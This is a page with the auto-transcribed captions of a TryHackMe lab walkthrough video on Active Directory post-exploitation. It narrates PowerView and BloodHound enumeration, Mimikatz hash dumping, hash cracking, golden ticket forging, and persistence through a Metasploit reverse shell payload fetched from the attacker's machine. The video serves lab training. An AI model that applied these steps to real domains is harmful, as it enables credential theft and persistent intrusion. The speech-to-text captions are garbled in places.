Active Directory Penetration Testing with Powershell and Mimikatz - TryHackMe

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
welcome back in today's video we're going to talk about post exploitation and enumeration so basically it is um post exclusive post exploitation basics from try hack me and as you can see i have access to the browser but we're going to do things from our cali machine it is better so basically we're going to talk about enumeration using power view which is a script partial script from partial empire and here bloodhounds for enumeration as well so as you can see part of you and both hand for enumeration mimikats dumping passwords hashes golden tickets post exploitation enumerating service manager server managers and maintaining access so you can see you can say that this um walkthrough is all about enumeration and post exploitation of course we're gonna do a bonus on this video we're gonna explore powershell empire as a post exploitation tool in addition to the tools we have seen here so basically power view is an option for enumeration bloodhound is an option also for enumeration of course the purpose of using power view and dot hand is to escalate your privileges to be an administrator and the same as mimikats repurposed with if you are dumping hashes or golden tickets with mimikats your purpose is to become an administrator on the domain controller or on other domain join machines so the purpose of all of that is to become an administrator or elevator privilege using post exploration tactics maintaining access is all about having a way to access the machine back in case it was shut down or logged out or in case you want to do it later okay so let's get started so first as you can see there are instructions on how to do that basically here we have username and password that's needed to log into the machine so this scenario this year assumes that we already have exploited a target okay and our next step now is to do post exploitation and elevation of privilege so basically i'm going to take the username as administrator and the password is paso123 at domain control controller.local i'm going to only copy the password here i'm gonna go back and here we're gonna have two channels so basically i'm gonna create a new tab split right so one here and one here so here gonna type sudo our desktop dash u administrator and of course we need to add the host files we're going to type sudo and nano [Music] ptc hosts so all the way down here we add the machine ip10249 0 here controller local which is the dns name so basically administrator controller local oh i messed this up okay yes accept the cert now the password we're gonna paste the password no okay pass word one two three um at login wrong okay still incorrect administrator welcome is it the space um let's copy the space password123 wow the password is incorrect we can try one more time okay controller local password okay i don't know why it's popped up around the domain name so i'm gonna cancel this so we're gonna the first scenario you have rdb access okay somewhere you have managed to enable rtb on the machine and access it using remote desktop so basically it's saying here access command prompt cmd and of course this is assuming that you have administrator access okay so here we are administrator i know it's kind of uh it doesn't make sense you are using post exploitation and enumeration elevation of privilege and you're already administrator right so this is just for demonstration and practice so here we type powershell dash ep bypass this one to bypass the execution policy departure script execution policy so right now here we started powershell on the other side we can also have an ssh access studio sh administrator ads controller lock controller controller yes okay password let's take the password hmm right now we have ssh access oh my administrator fine so now we get started the first thing uh suppose that as i said we have accessed a target and we want to enumerate uh for all of the uh existing users groups relationships the trusts so we can harvest and make use of all of these info to do privilege escalation of course we're not going to do privileged escalation on this machine since we are already administrators but that's the purpose of the practice here so right so here we go back and power view has already been imported into the target suppose that you have downloaded it yourself so we go to desktop or downloads ls we have power view the ps1 of course power view is part of powershell empire used for enumeration so basically here if we go to google open up google and here it is nice to have the commands our view of ps1 ready for us to um you know take a look at them you're not going to be able to memorize all commands right so power view and here corresponds so here are the commands okay every comment has its description you can open up the cheat sheet here okay and then you can see whatever fits your purpose so basically for example as the scenario in try hack me is saying try to find the users so we type get net user pipe select cn oh we have to start this before okay so we start this like that all right now the next thing is we type again get user select after we run the script we still we're still getting this net user is not recognized i go back here and type all right then get net users select cn okay here you can see we have the users administrator guest this is the identifier for the uh creepers tickets machine one admin two etc so we have enumerate the domain groups net get net group dash group name admin so it's trying to find what are the groups where the word admin is mentioned as you can see so we try to find this forget next so basically here are the groups where the administrators administrators are parts of administrators hyper-v storage replica administrators etc so as you can see we are here uh finding info about the active directory hierarchy the users the groups and most of the time our end our end goal is to find what are the groups that the domain admin is part of okay so basically here the domain admin if we go back to i guess what was the c delete the domain group admin okay here are the users so sometimes sometimes um administrator is part of domain admins and other groups okay so we want to find these groups when i find what are the groups that the administrator is part of and there might be sometimes that there is another administrator beside the main one so basically as you can see we have admin too we're also interested to find what are the groups the admin 2 belongs to okay so later down the road we can create our own users and add it to one of the groups beside the admin so let's go back and see how we can find this an acceptable command to the this version so basically here there is one um so if we enumerate the local groups this one enamored the groups and this one generate members of specific local group on the local machine that's what we want so this one here enumerate net local group member and we specify the number so let's first invoke the command or copy paste it i hope it's gonna work copy paste here doesn't work or we can try the ssh session way easier for copy paste so basically here we type let's go back first so on the ssh session here it's way more convenient for copy paste actually so paste uh for cell sp5 launch the tool and then here let's go back to the browser where is the browser okay so get net local group bumper let's say it is administrator and again we get this wow that's very okay let's try this one if we try like that dash member identity and here we type administrator okay let me cancel this get domain group isn't recognized as the name of cmt okay so it seems like i don't know what what's wrong with the tool being imported on the remote host uh let's let's stick with the um the the steps here so here the next it's asking what is the shared folder that is not set by default so it's like asking what is the shared folders on the um system here so to find the shirt voltage all we have to do is to type invoke share finder so basically we have remote admin default share ipc logon server and log on share server and the question is what is the shared border that is not set by default so for me it's the one that stands out is um this one share so if we type share here so answer is correct why shared is the shareholder that's not set by default as you can there is no description here and all of the rest um self-explanatory all of them are default right except this one the name indicates itself next question is what is the operating system running inside of the network besides windows server 2019 so here's the question what is the operating system running inside of the network besides windows server 2019 so as it's indicating there is another operating system running so to do that all you have to do is to type get net computer so basically we have domain controller desktop 2 and desktop 1. so what we have to do here is to uh find the operating system on every single one right that one two three the main one is windows server 2019 now we don't know what is the operating system running on the rest or the remaining two so what we have to do here get that computer dash full data and here we type pipe to select operating system so yeah to windows server 2019 windows 10 enterprise evaluation windows 10 enterprise evaluation so here we type windows 10 enter price duration okay i have hidden a flag inside of the users find it so there is a flag inside users let's find it how can we find this we don't have to navigate through the file system all we have to do is to use get net user so displays all info about the current user which is administrator so basically let's find out all of the how many stuff here we have seems like all of the users look at the account description this is the administrator account and this is another user i guess that was the question let's understand the question actually i have written a flag inside of the users find it okay sir let's find it my password is mypassword123 this is for which user okay if we type get in the user post this is for the current user that's what i'm looking for for the administrator top person post i type this so the same administrator here okay for the user post so the next question is i have hidden a flag inside of the users find it so there's a flag inside of users but the actually the sentence is vague right it doesn't specify whether it's inside of a user's directory or inside of users by the meaning of enumerating the users the correct explanation of this sentence is by enumerating all of the users you will find the flag so basically here what we have to do is to go back and enumerate the users and find which user we need to enumerate so we type get net user i know why it's typing zero okay net user and now we type select administrator guests machine 1 admin 2 post this one is interesting so to find out the info about specific user all you have to do is get or the same command here and we type the name of the user in this case it is post and you can see the flag is this one so let's find the formula so the formula is having oh what's that sometimes weird things happening on my laptop okay take this like that and we copy that submit and now it is correct so that was the purpose of using power view so power view is all about enumeration you find everything about the domain and there are more commands that you can imagine in part of you all you have to do is to go back here and look at these but some of them didn't work [Music] there is a web page or there is a link let me grab the link this link you can find this link also in the explanation of drag me so these are the comments and the as you can see the explanation for example give domain group dash member identity get all of the groups get all the groups a user is effectively a member of which is very effective you need to know that uh use an alternate credential for any function retrieve all computer dns host names so it's all about enumeration right you enumerate until you find a piece of data or piece of info that you know you may use it to elevate your privilege most of the time most of the time it is um pointing or pinning down the target user that you want to find the password hashtag in this case we know that the administrator user and we know that we need to find the admin to house okay so now the next step here is to use um let's go up anyone eat with bloodhounds so basically boothhound is two tools the bloodhound you install bloodhound on your local system and sharpcount you import char pounds into the target sharepoint will collect the information and store them in a zip file as if i will import a zip file to bloathead on your local machine to explore the results so once once we are logged in okay we can click on this button which is for importing data importing graph and basically we specify the file okay which we will take from the remote host this file will contain all of the data okay so click on x and we will head back to the target so the target is somewhere so this is ssh and the rdp is here okay now we will run the sharp hound okay and get everything ready so basically here we're going to type let me copy that first okay doesn't want to copy so we run char pound here okay and then we type invoke bloodhound there's collection method alt that's domain the domain name is control that local controller and we export everything to a zip file dash z it's going to be um according to hack me the name was loot so let's name it loot let's see so the file has been exported to administrator loot.c which is a number here so we navigate there or directly we see you have the root file all you have to do here is to transfer it we have to transfer one file to our machine which is dilute.zip to do that all you have to do is to run this command using scp right we transfer the file from the remote host to our local machine on this directory i have already done this so go and do it on your own this is the file next thing is we do it important with the bloat hound so all you have to do is to go to import to graph click on that and specify the file in my case it didn't work from this interface i had to just drag this here and drop it so then you go to uh click on this menu and you have queries in the queries you have all the predetermined prebuilt queries pre-compiled queries to enumerate the active directory in a graphical and visual way so for example to find all admins we can click on find the admins and we can see the domain admins so the main admins are make this bigger we have sql service and we have admin 2 administrator okay so we have three admins one of them is the service account which is the answer to one question on twitter hack me which is something vulnerable don't don't have any uh service account as administrator now the next one is to find list all keypress table accounts what i'm what do you mean by creepers table accounts are the accounts uh whose ticket the granting ticket can be harvested using creeproot and cracked offline to fix this we have to specify the pre-authentication to be enabled on these two accounts so that was for bloodhound of course you can go over all of the queries and enumerate them find computers with unsupported operating systems find keepers stable numbers of high value groups so that is the member who is keeper stable and high value keep or stable as we can see from the list paper stable accounts and high value why because it is an admin and it is part of administrators enterprise admins domain admins okay that was for bloodhound now the next thing is we go to mimikatz so basically with mimikatz here so many cats let me make this bigger so numeric ads as you all know we can run mimics with this command okay and first we have to check the privilege since mimics requires administrative privilege to be run if we get okay it means we have privilege to dump the hashes we have to type lsa dump lsa slash patch and we have the hashes now what's required from trying hack me is to find the password for an account named machine 1 and machine two so machine one this is the hash of machine one and this is the head of machine two now let's copy this and try to submit this here machine to hash submit that's correct now we have to find the machine one password to find this we have to use john turper or hashcat so we can go back okay so here we type sudo or we have to we have to copy the hash first the machine one is this one okay so sudo nano machine one paste the hash save it and now sudo um hash cat 1000 characters and we put the filename machine and the word list ordered its user share word lists right here okay now the alternative is to use john derker okay what else we can do with mimikatz we can impersonate the tickets the golden ticket principle we have done this before uh when we uh when i uploaded videos about active directory enumeration i don't remember the video name but there was one video where i did golden ticket impersonation to access other active directory computers so we're gonna demonstrate that's true here so the password is cracked and where's the password okay we have to do this dash dash show the password is password one take it and we go back paste submit okay that's also what we got so this is for dumping the hashes now golden tickets so golden tickets is all about instead of having the password you impersonate the ticket of the user if you are familiar about kirpros having the ticket of some user you can impersonate a login as the user or perform commands as the user so how to do that we need first to find um the hash of the accounts connected to kirplus which is uh the corporate uh the name of the account is the security identifier or i don't know the i didn't i don't remember i don't recall the name but this account starts with something like k r b t z t okay so basically we're gonna dump the hash of this account to impersonate and find the golden tickets so we do that from mimikats as well so we type lsa dump lsa slash inject name and you specify the accounts we want to dump the house of the security identifier of the keypress granting ticket account which is krb tgt so we type krbt and let's see what we have here so we have the um this identifier which is s i t it's going to be needed and we have the account name the identifier of the key plus ticket granting ticket account and we have it is hash so to create the or to find the golden ticket uh the command is also specified so we type qrs two times golden and then we specify the user which user i want to dump the ticket to grinding tickets let's say we are a non-administrative user okay something like machine one machine two and we want to dump the ticket granted tickets okay now since we have found the password of one user which was password one let's log in and simulate this behavior from a realistic scenario sudo evo when rm dash i controller dot local dash u uh username was something like machine one i remember it was with big a or i think it's speaking machine one dash p let's look and add this user and perform golden ticket attack of course this depends if machine one can run mimikatz if it if it can't we can't use this or we can't dumb the golden ticket of the administrator starting from machine one and the work i guess we can't even rm i guess let's type let's try rdp instead so sudo our desktop dash queue machine one the hostname will be controller so another session now take this and don't forget to replace this because controller okay the password is you have it password one oh no copy paste i remembered so password one to sign in remotely you need to write to sign in through remove the subservices by default members of the administrators group have this right okay oh we can't sign it okay so machine one is not a member of the remote desktop right that's why it can't sign in so basically if you go to bloodhound and find find workstations where domain users can rdp select domain users group no data let's see something has to do with rtp rdp i guess administrator is the only user let's find out from here let's go back to our old session and from here we click on where was this nope so here we have the users groups so rdb users rdp where is the group let me check on machine one properties uh member of domain users let's check on admin one admin to remember off administrators yes so admins we can do that so basically let's find the password of admin 2 and log in as admin 2 to perform the golden ticket from a realistic point of view basically go back here and we find the hash of admin 2. so admin 2 the ntlm hash is this one take it and go back sudo nano admin 2 this in the house and then um run hashcat on admit to exhausted didn't work on admin 2 so we can change its password no problem okay so admin two properties let's reset the password put something simple like um admin two item two uh thm so admin i don't have a complex password since the complex password will be hard to remember or will be hard to you know copy paste so let me type c okay dhm at admin 2 a okay dhm ads what kind of password policy it has let me see here a password that is not [Music] reset right oh god come on this is very draining sometimes it feels very to do this two three four 2 f 4. ad3 0 0 2 3 4 to f4 finally okay now let's do that and log in as admin 2 so here type your admin too right um here um what else okay controller the password o p a d okay so what we're going to be what what we will do here we will um simulate we will simulate the case where you have access to a machine and the user was not ditto at the original administrator or the domain controller admin 2 is an admin i know that but it is not the original admin and we will create the golden tickets now and after after creating the golden tickets we will be impersonating the original admin in this session so here we type cmd okay now it's going to take ages to run christ oh what do you mean there is no scene in the system i mean that's ridiculous if i type cmd again it's not going to find it or what [Music] run jesus christ you okay so the command prompt here i'm going to go back directly see the users see the admin 2 our city administrator because newcastle is there access denied okay we need the tool here actually um see the admin all right so we're really going to do that i'm going to cancel the session since the tool is not imported to add me into so i'm gonna stick with admin one okay let's continue on with the golden ticket now so we go back where was that okay so after we run the module we can see this id and we can see here the ntlm hash and the account now the rest is to run the command okay so basically we go down and here we specify the user okay that will be our we will be impersonating so in my case i am the administrator here okay i'm i'm gonna suppose that we want to impersonate admin to on the system okay so we type here admin to and type domain which is controller.local sid now this id take it from here okay and then we type slash id let's go up no go down so most probably the idea is the idea of the user actually we need right i go back here so basically we did the id of the admin to user so we go back and we type w mic user not typing user account get name s id you get a list of all the users and the less ids and of course we get the ids so basically the id here is this line administrator has the id of 500 admin 2 has the id of 1 1105 so 11005 and give us the missing the arguments what missing krp key argument so i have a missing argument here let's find out user domain and this id oh and we forgot the account actually so the account the kr btct account okay so basically the account we take this from all the way up which is the account hash the account has is this one so take it and go down paste it here so now as you can see the ticket to grant ticket has been as you can see final ticket save to file now we can access the computer of admin 2 or the desktop of admin 2 right we are now add we are now the administrator let's access admin 2 sorry type miscellaneous cmd right so what we do we have here let's um start do do that so basically what we can do here we can type oh we bring the backslash uh backslash i don't have it on my keyboard so for example type like that and then or before that we want to find the computers what what other computers we have so basically we go down entire directory and we're going to use again um power view right to find the computers circuit uh net computer so say we want to access desktop 2 right let's go back okay so from here uh i'm gonna be attempting to access the desktop 2 from here let's take the backslash first desktop 2 cmd.xd so we have problem now oh we forgot to type the tool actually so basically here after mimic ads we can exit memory cards or from other prompts from here let's say we're going to type ps6 egg backslash backslash desktop 2 right and cmd.exe and psx we don't have it so i'm gonna move now psx both desktop right again we go back type my ip again so my ap is like that look how easy it is i want to memorize 10.9 and then we type 8000 the tool name is so ps now let's run ps exec and the computer name the computer name the backslash save desktop2 yep and then we type cme.x it means that we want to access a command prompt on the computer desktop too i agree couldn't access desktop2 the share is enabled well this is weird let's try desktop one well let's try accessing some other share or some other command on that computer so let's say directory and here you go again the backslash wasting more time on backslashes okay say c as proposed line try me the network path couldn't be found so i'm not sure if the ticket granted you can successfully or to keep golden tickets has been generated successfully saying a final ticket safe to file okay let's do that so if you type here for the admin account and here we change the user so now we generate golden ticket for the administrator cmi.xe and here we new coin prompts okay so here we try again the network path can be found now when we have here three i guess so in this one administrator if we try to access the c hmm so for some reason i'm not able to spawn cmt.xe on other computers so i'm gonna skip this just have to type correct answer and we're gonna go on with the rest of the okay so here you enumerate the service manager the server manager right so you can see here all of the modules the things you can do with the server and here you can navigate to the active directory we have already done this and the question is what tool allows you to view the event logs clearly self-explanatory it's events viewer now what is the sql service password if you remember this account is this a service account that is an admin and to get the password all we have to do is to go to active directory or from here okay i don't want this so basically here we type active and see a list of users as you can see the sql servers has its password in the description so you click on properties we're not gonna you're gonna find this in the real world of course that's for the sake of answering the questions so the password is submit okay now what's next nick is maintaining access so here we have to use metasploit so first we generate let's do that so persistence is all about having uh or maintaining access to the machine okay so one way to do that is to change the password of one of these users so now we have access we can change the password or we have already got the password hashes for the users we can keep them and log in whenever we want now the the alternative is to use metaexploit to generate a payload transfer it over and run it and then run the persistence module so we can launch again the command line i'm going to keep this up so split the view okay so the msf venom windows [Music] which is the hardest to memorize ip address 9.2 [Music] um shell let's go back and do this from the command line so this is the target now here we will download search utel url if 132.252. so now it's being downloaded let's launch a listener now msf okay now use exploits oh no s oh i just memorized my ip address okay yes but i missed other things up set import okay um set auto one script post windows run handler failed to bind again i up my ip address nine one two two five two done okay so here execute the payload and we have received the interpreter session now for persistence to maintain access as i mentioned guys the password harvest is one way the second way is we use the a module from metasploit called local persistence so we say background use exploit windows show options no payload configured defaulting to windows interpreter okay fine so here we define the session set one right and here you see the ip change this or keep it if it is public ip keep it as it changes to public ip in my case i'm going to change this to the actual ip i have the vpn connection and i hit run so as you can see the auto run now has been installed on this registry key if we go down to our our desktop access and we inspect the registry so it's saying in microsoft the current user so basically current user um oh this software microsoft okay software microsoft and then current version run windows as you can see guys this is debugger modify this is the visual basic script running on the that's maintaining your access every time this computer runs every time this computer boots up this visual basic script will run and maintain your access that's another way now let me tell you about powershell empire now for powershell empire here we're going to specify a separate video for this i'm not going to do it this time we're going to do this in a separate video to lay down all of the partial empire basics basically it's a post exploitation framework as you all know so i enjoy i okay so that was it uh for partial empire we're gonna be dedicating a separate video for powershell empire with a practical scenario we're going to go through all of the modules all of the listeners or the stagers post explosion tactics steel tactics in the upcoming videos so stay tuned i hope you find this video enjoyable and we see you the next video
Info
Channel: Motasem Hamdan
Views: 5,763
Rating: undefined out of 5
Keywords: powershell, windows, pentesting, metasploit
Id: V3BkyAcYjPU
Channel Id: undefined
Length: 66min 21sec (3981 seconds)
Published: Wed Nov 11 2020
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.